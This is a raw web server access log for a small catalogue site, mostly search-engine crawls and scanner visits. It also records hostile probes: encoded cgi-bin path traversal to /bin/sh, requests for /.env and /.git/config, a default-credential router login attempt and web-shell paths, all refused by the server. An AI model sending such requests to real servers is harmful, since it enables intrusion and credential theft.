178.79.147.65 - - [04/Oct/2024:11:05:59 +0200] "\x16\x03\x01" 200 20819 "-" "-"
178.79.147.65 - - [04/Oct/2024:11:05:59 +0200] "\x16\x03\x01" 200 20819 "-" "-"
178.79.147.65 - - [04/Oct/2024:11:05:59 +0200] "\x16\x03\x01" 200 20819 "-" "-"
66.249.66.43 - - [04/Oct/2024:12:04:28 +0200] "GET /info.php?sifra=SPD14CS&skupina=136 HTTP/1.1" 200 17004 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [04/Oct/2024:12:24:28 +0200] "GET /skupine.php?skupina=131 HTTP/1.1" 200 15427 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
178.211.139.196 - - [04/Oct/2024:12:50:09 +0200] "GET /cgi-bin/index.cgi HTTP/1.1" 404 - "-" "-"
66.249.66.42 - - [04/Oct/2024:13:45:46 +0200] "GET /style.css HTTP/1.1" 200 11488 "https://212.44.99.48/skupine.php?skupina=34&stran=2" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [04/Oct/2024:14:22:00 +0200] "GET /skupine.php?skupina=82 HTTP/1.1" 200 27509 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [04/Oct/2024:14:28:18 +0200] "GET /skupine.php?skupina=48 HTTP/1.1" 200 18244 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [04/Oct/2024:14:28:22 +0200] "GET /style.css HTTP/1.1" 200 11488 "https://212.44.99.48/skupine.php?skupina=48" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
178.211.139.196 - - [04/Oct/2024:14:46:49 +0200] "GET /cgi-bin/index.cgi HTTP/1.1" 404 - "-" "-"
20.151.78.25 - - [04/Oct/2024:14:58:50 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 226 "-" "Custom-AsyncHttpClient"
20.151.78.25 - - [04/Oct/2024:14:58:57 +0200] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1" 400 226 "-" "Custom-AsyncHttpClient"
66.249.66.44 - - [04/Oct/2024:16:11:42 +0200] "GET /info.php?sifra=kos002&skupina=133 HTTP/1.1" 200 17456 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
167.94.138.35 - - [04/Oct/2024:16:14:42 +0200] "GET / HTTP/1.1" 200 20819 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.35 - - [04/Oct/2024:16:14:42 +0200] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.35 - - [04/Oct/2024:16:14:43 +0200] "PRI * HTTP/2.0" 400 226 "-" "-"
178.215.236.240 - - [04/Oct/2024:16:31:06 +0200] "GET /.env HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36"
66.249.66.44 - - [04/Oct/2024:16:43:31 +0200] "GET /info.php?sifra=HDEM135&skupina=82 HTTP/1.1" 200 19400 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
167.71.75.79 - - [04/Oct/2024:17:13:33 +0200] "GET /.env HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
82.79.67.194 - - [04/Oct/2024:17:29:53 +0200] "\x03" 200 16604 "-" "-"
66.249.66.42 - - [04/Oct/2024:18:07:32 +0200] "GET /info.php?sifra=95DNS&skupina=0 HTTP/1.1" 200 17022 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
34.219.3.243 - - [04/Oct/2024:18:09:22 +0200] "GET / HTTP/1.1" 200 20819 "-" "Mozilla/5.0 (X11; Linux i686; rv:54.0) Gecko/20100101 Firefox/54.0"
66.249.66.42 - - [04/Oct/2024:18:10:32 +0200] "GET /info.php?sifra=AM%2065&skupina=0 HTTP/1.1" 200 16996 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
198.235.24.216 - - [04/Oct/2024:18:11:09 +0200] "GET / HTTP/1.1" 200 20819 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
66.249.66.43 - - [04/Oct/2024:18:16:33 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [04/Oct/2024:18:16:34 +0200] "GET /skupine.php?skupina=34&stran=2 HTTP/1.1" 200 25744 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
178.211.139.196 - - [04/Oct/2024:19:07:09 +0200] "GET /cgi-bin/index.cgi HTTP/1.1" 404 - "-" "-"
45.95.169.130 - - [04/Oct/2024:19:47:02 +0200] "POST /FD873AC4-CF86-4FED-84EC-4BD59C6F17A7 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
45.95.169.130 - - [04/Oct/2024:19:47:10 +0200] "POST /index.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36"
66.249.66.44 - - [04/Oct/2024:20:26:31 +0200] "GET /info.php?sifra=kos%20001&skupina=0 HTTP/1.1" 200 17389 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
130.164.187.47 - - [04/Oct/2024:22:16:01 +0200] "GET / HTTP/1.0" 200 16604 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
66.249.66.42 - - [04/Oct/2024:22:26:44 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [04/Oct/2024:22:26:44 +0200] "GET /info.php?sifra=51151&skupina=100 HTTP/1.1" 200 17613 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [04/Oct/2024:22:40:01 +0200] "GET /info.php?sifra=28515&skupina=82 HTTP/1.1" 200 19129 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [04/Oct/2024:22:40:21 +0200] "GET /info.php?sifra=502986&skupina=42 HTTP/1.1" 200 18920 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [04/Oct/2024:22:53:04 +0200] "GET /info.php?sifra=990980&skupina=39 HTTP/1.1" 200 17850 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
117.216.185.176 - - [04/Oct/2024:22:59:31 +0200] "GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0" 404 - "-" "-"
66.249.66.43 - - [04/Oct/2024:23:02:10 +0200] "GET /info.php?sifra=95SNS&skupina=0 HTTP/1.1" 200 17019 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.41 - - [04/Oct/2024:23:29:23 +0200] "GET /info.php?sifra=SPD14CS&skupina=136 HTTP/1.1" 200 17004 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [05/Oct/2024:01:36:38 +0200] "GET /slike/103031-1.jpg HTTP/1.1" 200 3397 "-" "Googlebot-Image/1.0"
167.71.239.65 - - [05/Oct/2024:01:45:50 +0200] "\x16\x03\x01" 200 20819 "-" "-"
167.71.239.65 - - [05/Oct/2024:01:45:50 +0200] "\x16\x03\x01" 200 20819 "-" "-"
167.71.239.65 - - [05/Oct/2024:01:45:50 +0200] "GET / HTTP/1.1" 200 20819 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
167.71.239.65 - - [05/Oct/2024:01:45:51 +0200] "GET /form.html HTTP/1.1" 404 - "-" "curl/8.1.2"
167.71.239.65 - - [05/Oct/2024:01:45:51 +0200] "GET /upl.php HTTP/1.1" 404 - "-" "Mozilla/5.0"
167.71.239.65 - - [05/Oct/2024:01:45:52 +0200] "GET /t4 HTTP/1.1" 404 - "-" "Mozilla/5.0"
167.71.239.65 - - [05/Oct/2024:01:45:52 +0200] "GET /geoip/ HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
167.71.239.65 - - [05/Oct/2024:01:45:52 +0200] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
167.71.239.65 - - [05/Oct/2024:01:45:53 +0200] "GET /1.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
167.71.239.65 - - [05/Oct/2024:01:45:53 +0200] "GET /systembc/password.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
167.71.239.65 - - [05/Oct/2024:01:45:53 +0200] "GET /password.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
170.64.193.56 - - [05/Oct/2024:02:00:53 +0200] "GET /.env HTTP/1.1" 404 - "-" "Mozilla/5.0 Keydrop"
170.64.193.56 - - [05/Oct/2024:02:00:54 +0200] "GET /" 400 474 "-" "-"
162.216.150.122 - - [05/Oct/2024:02:07:02 +0200] "GET / HTTP/1.1" 200 20819 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
178.215.236.240 - - [05/Oct/2024:02:23:47 +0200] "GET /.git/config HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Maxthon/5.0.4.3000 Chrome/47.0.2526.73 Safari/537.36"
162.216.149.140 - - [05/Oct/2024:02:27:09 +0200] "GET / HTTP/1.1" 200 20819 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
119.194.144.101 - - [05/Oct/2024:02:46:15 +0200] "GET / HTTP/1.0" 200 20819 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
66.249.66.42 - - [05/Oct/2024:02:55:03 +0200] "GET /info.php?sifra=1003028&skupina=44 HTTP/1.1" 200 18534 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [05/Oct/2024:03:06:38 +0200] "GET /slike/1003026-1.jpg HTTP/1.1" 200 2823 "-" "Googlebot-Image/1.0"
88.225.212.220 - - [05/Oct/2024:03:24:01 +0200] "GET / HTTP/1.0" 200 20819 "-" "-"
66.249.66.44 - - [05/Oct/2024:03:26:54 +0200] "GET /info.php?sifra=283737&skupina=0 HTTP/1.1" 200 17391 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [05/Oct/2024:04:12:01 +0200] "GET /info.php?sifra=HDEM135&skupina=82 HTTP/1.1" 200 19400 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.41 - - [05/Oct/2024:04:12:13 +0200] "GET /style.css HTTP/1.1" 200 11488 "https://212.44.99.48/info.php?sifra=HDEM135&skupina=82" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [05/Oct/2024:04:34:31 +0200] "GET /slike/16.010-2.jpg HTTP/1.1" 200 7212 "-" "Googlebot-Image/1.0"
143.110.167.209 - - [05/Oct/2024:04:38:40 +0200] "GET / HTTP/1.1" 200 20819 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
143.110.167.209 - - [05/Oct/2024:04:38:40 +0200] "GET /favicon.ico HTTP/1.1" 404 - "http://212.44.99.48/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
66.249.66.44 - - [05/Oct/2024:04:56:59 +0200] "GET /info.php?sifra=dbm020&skupina=0 HTTP/1.1" 200 17525 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [05/Oct/2024:05:24:43 +0200] "GET / HTTP/1.1" 200 20819 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [05/Oct/2024:05:24:44 +0200] "GET / HTTP/1.1" 200 20819 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [05/Oct/2024:05:26:31 +0200] "GET /skupine.php?skupina=86&stran=3 HTTP/1.1" 200 18487 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
198.235.24.247 - - [05/Oct/2024:05:32:43 +0200] "GET / HTTP/1.0" 200 20819 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
66.249.66.43 - - [05/Oct/2024:05:41:59 +0200] "GET /info.php?sifra=AM%2065&skupina=77 HTTP/1.1" 200 17011 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [05/Oct/2024:05:44:00 +0200] "GET /info.php?sifra=100315&skupina=0 HTTP/1.1" 200 17080 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [05/Oct/2024:06:21:48 +0200] "GET /info.php?sifra=281565&skupina=103 HTTP/1.1" 200 17643 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [05/Oct/2024:06:29:48 +0200] "GET /info.php?sifra=50151&skupina=100 HTTP/1.1" 200 17702 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [05/Oct/2024:06:54:48 +0200] "GET /skupine.php?skupina=55 HTTP/1.1" 200 22068 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [05/Oct/2024:06:56:45 +0200] "GET /info.php?sifra=4749&skupina=42 HTTP/1.1" 200 19043 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [05/Oct/2024:06:57:49 +0200] "GET /info.php?sifra=111.15.01&skupina=54 HTTP/1.1" 200 17409 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [05/Oct/2024:07:05:49 +0200] "GET /skupine.php?skupina=82&stran=4 HTTP/1.1" 200 27543 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [05/Oct/2024:07:09:49 +0200] "GET /info.php?sifra=95DNS&skupina=136 HTTP/1.1" 200 17045 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [05/Oct/2024:07:11:50 +0200] "GET /info.php?sifra=7212&skupina=42 HTTP/1.1" 200 18602 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [05/Oct/2024:07:11:59 +0200] "GET /skupine.php?skupina=86&stran=2 HTTP/1.1" 200 27701 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [05/Oct/2024:07:15:36 +0200] "GET /info.php?sifra=HDEM105m&skupina=82 HTTP/1.1" 200 19107 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
162.142.125.33 - - [05/Oct/2024:07:31:49 +0200] "GET / HTTP/1.1" 200 20819 "-" "-"
162.142.125.33 - - [05/Oct/2024:07:31:58 +0200] "GET / HTTP/1.1" 200 20819 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.33 - - [05/Oct/2024:07:32:00 +0200] "PRI * HTTP/2.0" 400 226 "-" "-"
66.249.66.42 - - [05/Oct/2024:07:39:32 +0200] "GET /skupine.php?skupina=81 HTTP/1.1" 200 25392 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [05/Oct/2024:07:58:44 +0200] "GET /info.php?sifra=48218&skupina=63 HTTP/1.1" 200 17151 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [05/Oct/2024:08:37:32 +0200] "GET /info.php?sifra=KL60IBN&skupina=31 HTTP/1.1" 200 17815 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [05/Oct/2024:08:41:33 +0200] "GET /info.php?sifra=KL80IB&skupina=31 HTTP/1.1" 200 17790 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [05/Oct/2024:08:41:34 +0200] "GET /info.php?sifra=990980&skupina=31 HTTP/1.1" 200 17783 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [05/Oct/2024:08:50:34 +0200] "GET /info.php?sifra=535002&skupina=31 HTTP/1.1" 200 17732 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [05/Oct/2024:09:02:20 +0200] "GET /info.php?sifra=308048&skupina=0 HTTP/1.1" 200 17382 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
103.186.28.74 - - [05/Oct/2024:09:11:50 +0200] "GET / HTTP/1.0" 200 20819 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
66.249.66.42 - - [05/Oct/2024:09:37:32 +0200] "GET /info.php?sifra=535703&skupina=31 HTTP/1.1" 200 17732 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [05/Oct/2024:09:46:33 +0200] "GET /info.php?sifra=2RTO82&skupina=31 HTTP/1.1" 200 17770 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [05/Oct/2024:09:47:33 +0200] "GET /info.php?sifra=4RTO82&skupina=31 HTTP/1.1" 200 17652 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [05/Oct/2024:09:49:34 +0200] "GET /info.php?sifra=KL100IBN&skupina=31 HTTP/1.1" 200 17825 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [05/Oct/2024:09:56:34 +0200] "GET /info.php?sifra=535709&skupina=31 HTTP/1.1" 200 17729 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.81.168 - - [05/Oct/2024:10:07:03 +0200] "GET /slike/jonseredv.jpg HTTP/1.1" 200 10649 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0 (via ggpht.com GoogleImageProxy)"
66.249.66.44 - - [05/Oct/2024:10:49:38 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [05/Oct/2024:10:49:38 +0200] "GET /info.php?sifra=2RTO81&skupina=31 HTTP/1.1" 200 17805 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
